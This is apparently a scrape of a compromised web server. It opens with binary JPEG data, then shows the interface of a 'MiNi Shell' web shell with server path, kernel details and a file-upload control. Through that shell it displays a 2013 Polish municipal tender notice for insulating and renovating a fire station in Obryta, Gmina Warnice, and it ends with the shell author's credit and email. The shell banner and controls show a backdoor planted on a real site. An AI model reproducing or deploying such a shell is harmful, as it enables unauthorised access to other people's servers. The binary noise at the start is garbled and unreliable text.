JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130125/35628-N-2013.html

<p class="kh_header"><b>Warnice: Termomodernizacja budynku remizy strażackiej w miejscowości Obryta.</b><br>
<b>Numer ogłoszenia: 35628 - 2013; data zamieszczenia: 25.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Warnice , Warnice 66, 74-201 Warnice, woj. zachodniopomorskie, tel. 91 561 28 90, faks 91 561 28 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku remizy strażackiej w miejscowości Obryta..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest termomodernizacja budynku remizy strażackiej w miejscowości Obryta 42b zlokalizowanego na działce nr geod. 232/2 obr. Obryta gmina Warnice. 

Zakres prac będzie obejmował:
1.	Wymianę istniejącej stolarki drzwiowej
-	obmiar z natury 1 drzwi przeznaczonych do wymiany w elewacji bocznej
-	demontaż istniejących drzwi i ościeżnic
-	montaż nowych drzwiami wraz z ościeżnicami
-	demontaż istniejących parapetów zewnętrznych 3 szt.,
-	osadzenie parapetów zewnętrznych z blachy stalowej ocynkowanej lub równoważnych jakościowo
-	uszczelnienie styku ościeżnic i ościeży pianką poliuretanową
-	naprawa i uzupełnienia tynków ościeży
-	pomalowanie tynków ościeży
-	zabezpieczenie folią posadzek 
-	wywiezienie zdemontowanych drzwi i parapetów oraz ewentualnego gruzu na wysypisko do tego przeznaczone
2.	Odkopanie ścian fundamentowych w celu ułożenia izolacji pionowej
-	wykonanie izolacji poziomej ław i ścian fundamentowych
-	wykonanie izolacji pionowej ścian fundamentowych
3.	Wykonanie robót murowych
-	wzmocnienie ścian w miejscach wyraźnie zarysowanych
-	przemurowanie ścian w miejscach występowania ubytków lub osłabienia ściany
-	wypełnienie ubytków spoin w ścianach
-	przemurowanie kominów

4.	Docieplenie elewacji
-	przygotowanie istniejącego podłoża przez odbicie odparzonych i luźnych fragmentów tynku oraz oczyszczenie i zmycie
-	przygotowanie podłoża przez dwukrotnie gruntowanie preparatem wzmacniającym
-	sprawdzenie przyczepności zaprawy klejącej do podłoża
-	sprawdzenie nośności kołków w podłożu
-	przyklejenie i mocowanie płyt styropianowych
-	wykonanie warstwy zbrojonej na elewacji i ościeżach, do wysokości 2,0 m podwójnej
-	docieplenie istniejących wrót garażowych
5.	Wykonanie opaski betonowej wokół budynku.
6.	Wykonanie cokolika z płytek klinkierowych.
7.	Wymianę blacharki wraz z obróbkami.
-	montaż obróbek blacharskich dachu
-	montaż rynien i rur spustowych
UWAGA: ZAMAWIAJĄCY DYSPONUJE WŁASNYM MATERIAŁEM W POSTACI RYNIEN, RUR SPUSTOWYCH ORAZ ELEMENTÓW MOCUJĄCYCH RYNNY. 
Przy wymianie rynien należy przewidzieć sam koszt robocizny.
8.	Jednokrotne pokrycie całego dachu papą termozgrzewalną
-	na warstwie termoizolacyjnej wykonanie pokrycia dachowego obejmującego warstwę wierzchnią z papy termozgrzewalnej i warstwę spodnią z papy podkładowej samoprzylepnej,
-	zamontować krawędziak drewniany zaimpregnowany o wym. 120mm×120 mm na krawędziach dachu w celu zamocowania orynnowania i obróbek blacharskich
-	montaż rynien i rur spustowych z blachy ocynkowanej
-	zabezpieczenie folią posadzek 
9.	Ocielpenie kominów z okładziną z płytek klinkierowych.
10.	Montaż dwóch daszków nad wejściami do budynku.
11.	Wykonanie instalacji odgromowej
-	demontaż istniejącej instalacji odgromowej
-	montaż instalacji odgromowej
-	prace porządkowe

Szczegółowy zakres robót objętych zamówieniem zawiera przedmiar robót budowlanych stanowiący załącznik nr 7 do specyfikacji istotnych warunków zamówienia oraz specyfikacje techniczne wykonania i odbioru robót budowlanych stanowiące załącznik nr 6 do specyfikacji istotnych warunków zamówienia.

Jeżeli w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych lub przedmiarze robót - stanowiących załączniki do Specyfikacji Istotnych Warunków Zamówienia, zostały wprowadzone nazwy własne materiałów lub produktów, Zamawiający dopuszcza zastosowanie materiałów i produktów równoważnych do wskazanych pod warunkiem posiadania przez te materiały i produkty nie gorszych parametrów technicznych, charakteryzujących wskazany produkt, stanowiących o ich przydatności, charakterze, wytrzymałości itp.

Zamawiający wymaga, aby wymieniane drzwi zewnętrzne były drzwiami antywłamaniowymi z ryglami blokującymi, posiadającymi wizjer szerokokątny, z dwoma zamkami, w kolorach (białe, dąb, mahoń, orzech, calvados - kolor do ustalenia w wyłonionym wykonawcą). Do drzwi należy dołączyć 3 komplety kluczy. 
Zamawiający określa kolorystykę tynku barwionego w odcieniach żółci lub beżu (skala intensywności średnia do jaskrawej) z jaśniejszym obramowaniem otworów okiennych i drzwiowych.

Jeżeli w specyfikacji istotnych warunków zamówienia, przedmiarze robót, specyfikacjach technicznych wykonania i odbioru robót wymienione zostały materiały budowlane, bez uszczegółowienia ich parametrów typu kolor, materiał, z jakiego mają być wykonane, charakterystyczne parametry wytrzymałościowe, wykonawca jest zobowiązany zadać pytanie na etapie składania ofert o uszczegółowienie tych parametrów. Nie zadanie pytania przez Wykonawcę, nie może skutkować założeniem przez Wykonawcę danego rodzaju materiału, jego kolorystyki, czy parametrów wytrzymałościowych, i brakiem możliwości wyboru materiałuw trakcie realizacji robót przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.42.11.30-4, 45.32.10.00-3, 45.43.10.00-7, 45.43.11.00-8, 45.11.12.20-6, 45.26.12.10-9, 45.26.25.22-6, 45.31.11.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium. 
2.	Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 
2 000,00  zł (słownie: dwa tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wykaże, że zrealizował w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzy roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o  wartości zamówienia nie mniejszej niż 100 000,00 zł brutto. Warunek zostanie spełniony, jeżeli wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca udokumentuje dysponowanie: kierownikiem budowy, posiadającym wymagane uprawnienia budowlane w zakresie wykonawczym 
w specjalności konstrukcyjno - budowlanej oraz posiadającym zaświadczenie potwierdzające przynależność do właściwej izby samorządu zawodowego. Warunek zostanie spełniony, jeżeli wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	formularz oferty - załącznik nr 1 do Specyfikacji istotnych warunków zamówienia  - wypełniony / przepisany zgodnie z zasadami podanymi w rozdziale XI wraz z kosztorysem ofertowym uproszczonym,
2)	oświadczenie spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art.22 ust.1 ustawy Prawo zamówień publicznych i oświadczenie o braku podstaw do wykluczenia art.24 ust.1 ustawy Prawo zamówień publicznych - formularz stanowiący załącznik nr 2, 2a do Specyfikacji istotnych warunków zamówienia,
3)	wykaz, co najmniej trzech wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie zasadami sztuki budowlanej i prawidłowo ukończone - na formularzu stanowiącym załącznik nr 3 do specyfikacji,
4)	oświadczenie stwierdzające, że kierownik budowy posiada wymagane uprawnienia budowlane oraz przynależy do właściwej izby samorządu zawodowego, na formularzu stanowiącym załącznik nr 4 do specyfikacji.
5)	dokument informujący o podstawie do dysponowania osobą wskazaną do pełnienia funkcji kierownika budowy, na formularzu stanowiącym załącznik nr 4a do specyfikacji   
6)	W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależne od charakteru prawnego łączących go z nim stosunków; wykonawca przedstawia pisemne zobowiązanie tych podmiotów do wsparcia tj. oddania mu do dyspozycji niezbędnych  zasobów na okres korzystania z nich przy wykonywaniu  zamówienia (podmiot nie uczestniczący w postępowaniu).
7)	parafowany i zaakceptowany projekt umowy z wykonawcą - stanowiący załącznik nr 5 do specyfikacji.
8)	dokument potwierdzający wniesienie wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano  wyboru wykonawcy, w przypadkach wystąpienia przynajmniej jednej z okoliczności  wymienionych poniżej, z uwzględnieniem  podanych warunków ich wprowadzenia:

1)	Zmiana terminu na ukończenia robót:
a)	Zmiany spowodowane warunkami atmosferycznymi w szczególności:
-	klęski żywiołowe,
-	warunki atmosferyczne odbiegające od typowych uniemożliwiające prowadzenie robót budowlanych, przeprowadzenia prób sprawdzeń, dokonywania odbiorów, zgodnie z  polskimi normami i warunkami technicznymi wykonania robot.
b)	Zmiany spowodowane nieprzewidzianymi warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności:
-	wykopaliska archeologiczne
-	niewypały i niewybuchy
-	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych.
c)	Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
-	wstrzymanie robót przez Zamawiającego;
-	konieczności usunięcia błędów lub wprowadzenie zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót.
-	konieczność wykonania robót dodatkowych lub zamiennych nie przewidzianych 
w projekcie budowlanym 
d)	Zmiany przepisów prawa niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych umową.

2)	Zmiany sposobu spełniania świadczeń:
a)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzeniu  kosztów eksploatacji lub uzyskanie lepszej jakości.
b)	pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej  na zaoszczędzeniu czasu realizacji inwestycji, jak również kosztów eksploatacji  wykonywanego przedmiotu umowy.
c)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niewskazane w dokumentacji projektowej lub specyfikacji  technicznej wykonania  i odbioru robót, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło by niewykonaniem  lub wadliwym wykonaniem przedmiotu umowy.
d)	odmienne od przyjętych  w dokumentacji projektowej  lub specyfikacji technicznej wykonania i odbioru robót warunki terenowe, w szczególności istnienie nie zinwentaryzowanych lub błędnie  zinwentaryzowanych  obiektów budowlanych.
e)	konieczność zrealizowania przedmiotu  umowy przy zastosowaniu innych rozwiązań technicznych  lub materiałowych ze względu na zmiany obowiązującego prawa.
f)	rezygnacja z podwykonawstwa, wykonując przedmiot zamówienia  przy udziale Podwykonawców. 
W przypadku wystąpienia  którejkolwiek  z okoliczności wymienionych w pkt 2) możliwa jest  w szczególności zmiana sposobu wykonywania, materiałów  i technologii  robót, jak również zmiany  lokalizacji  budowanych  urządzeń.

3)	Zmiany osobowe:
a)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w Specyfikacji Istotnych Warunków Zamówienia, według polityki kadrowej wykonawcy.
b)	zmiana osób podanych w ofercie Wykonawcy przy pomocy których Wykonawca realizuje przedmiot umowy nie wymaga aneksu do umowy. Zmiana jest możliwa na osoby spełniające wymogi Specyfikacji Istotnych Warunków Zamówienia, a dla uzyskania  skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną zmianę osobową. 

4)	Pozostałe zmiany spowodowane następującymi okolicznościami:
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ.
b)	zmiana obowiązującej stawki VAT.
c)	zmiana  sposobu rozliczania  umowy  lub dokonywania płatności  na rzecz Wykonawcy na skutek zmiany  zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych  dotyczących realizacji projektu.
d)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy.
e)	kolizja z planowanymi lub równolegle  prowadzonymi przez inne podmioty inwestycjami w takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych  
f)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca  niemożliwością wykonywania  lub należytego wykonania umowy zgodnie z Specyfikacją Istotnych Warunków Zamówienia.

Wszystkie powyższe postanowienia określone w ust.2 pkt 2 stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania  do wyrażenia takiej zgody.

2.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
a)	zmiana danych związanych z obsługą  administracyjno organizacyjna umowy 
(np. zmiana nr rachunku bankowego).
b)	zmiana danych teleadresowych.
c)	udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.warnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Warnice
Warnice 66
74 - 201 Warnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2013 godzina 10:00, miejsce: Urząd Gminy Warnice, sekretariat
Warnice 66
74 - 201 Warnice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com